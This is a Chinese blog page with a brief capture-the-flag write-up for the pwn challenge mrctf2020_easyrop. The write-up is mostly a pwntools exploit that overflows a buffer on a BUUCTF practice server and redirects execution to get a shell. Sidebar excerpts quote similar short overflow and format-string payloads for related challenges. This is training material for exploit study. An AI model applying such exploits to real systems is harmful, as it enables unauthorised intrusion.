mrctf2020_easyrop

最新推荐文章于 2023-05-06 00:08:28 发布
最新推荐文章于 2023-05-06 00:08:28 发布
阅读量360 收藏 1
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124076982
版权

mrctf2020_easyrop

查看保护
在这里插入图片描述
简单题
在这里插入图片描述
用hehe和byby这两个函数配合起来rop就行

from pwn import *
from time import sleep
context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 26201)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shell = 0x40072A

r.sendline('2')
p1 = b'a' * 0x300
sleep(1)
r.send(p1)

r.sendline('7')
sleep(1)
p2 = b'a' * 0x12 + p64(shell)
r.send(p2)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
BUUCTF------mrctf2020_easyoverflow
qq_33010875的博客
10-08 327
环境:WSL2,ubuntu16.04,python2 checksec文件: 拖入ida分析: main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行 查看check函数: 只要a1和fake_flag相等,函数就能返回1 a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g fake_flag的值为:n0t_r3@11y_f1@g 只要将v5的值覆盖为n0t_r3@11y_f1@g即可 main函数中有get函数可用, v4: v4是var_
[BUUCTF]PWN——mrctf2020_easyoverflow
mcmuyanga的博客
01-12 957
mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shell check() 很简单的检查,就是判断一下v5是否等于n0t_r3@11y_f1@g 看main函数可以知道,v5一开始是ju3t_@_f@k3_f1@g,之后没有对v5的操作了,然后让我们输入v4,看一下v4和v5在栈上的位置,发现v5就在v4下方不远处 v4的输入是用的gets函数,我们可以在
BUUCTF(pwn)mrctf2020_easyoverflow
半岛铁盒的博客
04-06 563
简单的溢出覆盖 from pwn import * r=remote("node3.buuoj.cn",25789) payload='a'*0x30+"n0t_r3@11y_f1@g" r.sendline(payload) r.interactive()
[BUUCTF-pwn]——mrctf2020_easyoverflow
Y_peak的博客
03-29 221
[BUUCTF-pwn]——mrctf2020_easyoverflow 题目不难这里就简单讲下思路 思路 因为check函数返回0才可以得到shell. 通过gets函数,我们可以将v5修改为我们想要的。 找到fake_flag 为n0t_r3@11y_f1@g 修改为这个就可以了。相同肯定返回0. exploit from pwn import * p = remote("node3.buuoj.cn",26609) payload = 'a'* 0x30 + "n0t_r3@11y_f1@g" p.s
BUUCTF(pwn)mrctf2020_easy_equation
半岛铁盒的博客
03-30 620
这道题是个相对简单的格式化字符串的题目, 但是做题过程中需要自己的一些debug调试查看; 计算偏移量 初看偏移量是8; 构建初始payload,EXP;payload="aa%8$n"+p64(judge) from pwn import* context.log_level='debug' p=remote('node3.buuoj.cn',27636) judge=0x60105c payload="aa%8$n"+p64(judge) p.sendline(payload) p.inter
vigenere-cipher:Vigenere密码
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
1.mrctf[friendly_sign-in] 意思就是服务器产生一个数组$N$,需要输入一个数组$X$与其对应位置乘积和为$0$,题目说$N$中全为素数,实际好像不是,因为产生这么多素数比较耗时间,但里面还是大部分都是素数。这里可以...
[MRCTF2020]EasyCpp
m0_46296905的博客
04-20 879
题目:[MRCTF2020]EasyCpp 这题是一个用g++编译的C++逆向题,第一次碰到这种类型,边做边学习吧。 因为是初次接触C++逆向,如有不足,欢迎评论区指正。 一、main IDA64查看main函数的伪代码如下,各个反汇编后伪代码的注释也已经给出,仅供参考: int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rax __int64 v4; // rbx __int6
mrctf2020_easyoverflow [write up]
m0_73756460的博客
01-14 257
buuctf 刷题 mrctf2020_easyoverflow [write up]
buu [MRCTF2020]EasyCpp
YenKoc的博客
04-17 781
上次没写出,这次认真分析了一下,发现自己的调试水平也有了上涨,也看了一些C++逆向的文章,尤其是stl,发现C++的oop还是挺复杂,这题还没考啥虚函数的还行了。 一.拖入ida,找到主函数,还是挺容易的 int __cdecl main(int argc, const char **argv, const char **envp) { double v3; // xmm0_8 __int...
Pwn】NCTF2019 easy_rop
Nothing
12-03 1106
查看程序保护。 分析程序,程序只有一个main函数。 v6距离rbp为0x70,在输入数字的时候可以输34 * 4个字节的数,34*4-0x70=24,意味着可以溢出覆盖rbp,ret_address,以及返回地址下面的8个字节。main函数的old_rbp值实际上是代码段init的地址,返回地址位置是libc中的一个地址。scanf函数%d当输入为’+'时不会改变原内存中数据,于是可以来泄露代...
easyROPtocol
u014377094的博客
03-05 195
感觉重点在构造,但其实跑起来试试就逝世。拉锯数小时,beng bu zhu le。 官方wp传送门VNCTF 2022 Official WriteUp.pdf (tonycrane.cc) 打开main,里面123对应着创建删除运行。 重点在1里 第二个if如果不满足就会删除 v1里 决定了前4位的数(如果选择两个一起放,记得处理小端序),后面则告诉我们几位不能为0几位必须为0,12里非5即6 第二个里是个^。先去处理第一个,第二个再处理。 struct message { .
2022 VNCTF easyROPtocol
weixin_46483787的博客
04-09 1800
一道协议逆向+orwROP的题,基本上难度在于给出符合要求的协议头和校验和 拿到题目: 在打印的信息中我们可以获取到,这个程序是TCP protocol的C语言实现 于是先把TCP的头部结构拿过来: 首先进add函数里看看: 可以看到能够申请最多4个chunk,每个chunk最多0x1000 生成之后要通过check_head函数和check_sum的检测 首先看check_head: 从这里可以得到确定一些头部信息,如源端口和目的端口,还有urgent_ptr必须为0,等,还有一些属性只能缩小范围,
2020MRCTF - 部分Pwn
weixin_44864859的博客
04-09 328
easyoverflow 保护全开,但这里只需要栈溢出覆盖数据满足check函数判断就好了。 exp: from pwn import * context.log_level = 'debug' p = remote('38.39.244.2',28082) payload="a"*48 + "n0t_r3@11y_f1@g" p.sendline(payload) p.interacti...
XSCTF联合招新赛(热身赛)babystack & easyrop
红叶的博客
10-29 1913
开启了栈不可执行,但是在 IDA Pro 中发现了backdoor函数。
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1507
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop
CTF-PWN-callme32 [ROP+栈溢出]
SuperGate的博客
08-13 910
首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcode ida发现一个重要函数如下: 点入后发现这三个函数为系统级调用。正好题目给了我们一个.so文件。进入查看,发现有这三个函数的反编译。依次是将加密后的flag通过key1,key2解密。调用顺序应该是callme_one -> callme_two -> c...
buuctf misc [MRCTF2020]ezmisc 1
最新发布
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值